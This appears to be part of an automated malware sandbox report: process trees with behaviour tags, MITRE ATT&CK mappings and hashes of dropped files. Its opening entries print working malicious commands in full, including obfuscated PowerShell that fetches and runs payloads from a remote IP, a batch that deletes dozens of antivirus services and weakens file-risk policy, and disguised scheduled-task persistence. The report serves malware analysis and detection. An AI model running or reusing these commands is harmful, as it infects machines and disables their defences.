powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
PID:812

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
4⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\8D54.exe
C:\Users\Admin\AppData\Local\Temp\8D54.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2684

C:\Users\Admin\AppData\Local\Temp\8D54.exe
C:\Users\Admin\AppData\Local\Temp\8D54.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 1464
3⤵
- Program crash
PID:4252

C:\Users\Admin\AppData\Local\Temp\90B1.exe
C:\Users\Admin\AppData\Local\Temp\90B1.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1192

C:\Users\Admin\AppData\Local\Temp\949A.exe
C:\Users\Admin\AppData\Local\Temp\949A.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2248

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3748

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3996

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1596

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1672

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3848

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3704

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3056

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\ProgramData\Templates\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5048

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\install.exe
MD5
3319cb474eaa2f3812956b271ff29635

SHA1
74fbed926e8de14fa5eb6a5a47fb873def72fb81

SHA256
79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

SHA512
c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

Download Submit
C:\ProgramData\Data\install.exe
MD5
3319cb474eaa2f3812956b271ff29635

SHA1
74fbed926e8de14fa5eb6a5a47fb873def72fb81

SHA256
79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

SHA512
c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
41c30885a9306086f05f6935fbc51753

SHA1
f8b1e1d1bea0c149ffc871e31c87c4f463122960

SHA256
206c1ae51b4cb137795296086fdce9238bb4ace5f1c6d3ad61780d5071253639

SHA512
0d8708730bceea15a478d3b3a36cdb93b2ab53cc14c311d9ae19ebb9a39394a97e75ec2814b78702ec1a529198c719937c2e43a9eece94d8c352f18842f2dc47

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
41c30885a9306086f05f6935fbc51753

SHA1
f8b1e1d1bea0c149ffc871e31c87c4f463122960

SHA256
206c1ae51b4cb137795296086fdce9238bb4ace5f1c6d3ad61780d5071253639

SHA512
0d8708730bceea15a478d3b3a36cdb93b2ab53cc14c311d9ae19ebb9a39394a97e75ec2814b78702ec1a529198c719937c2e43a9eece94d8c352f18842f2dc47

Download Submit
C:\ProgramData\Systemd\HostData.exe
MD5
cbf26c74a0a12b5f17ba7596ff6ad19f

SHA1
6dc733432c290f1fbf5ddda2571b7f538445202b

SHA256
095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

SHA512
8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

Download Submit
C:\ProgramData\Systemd\HostData.exe
MD5
cbf26c74a0a12b5f17ba7596ff6ad19f

SHA1
6dc733432c290f1fbf5ddda2571b7f538445202b

SHA256
095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

SHA512
8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

Download Submit
C:\ProgramData\Systemd\config.json
MD5
a285ac140c8c6806223bfdc02302173e

SHA1
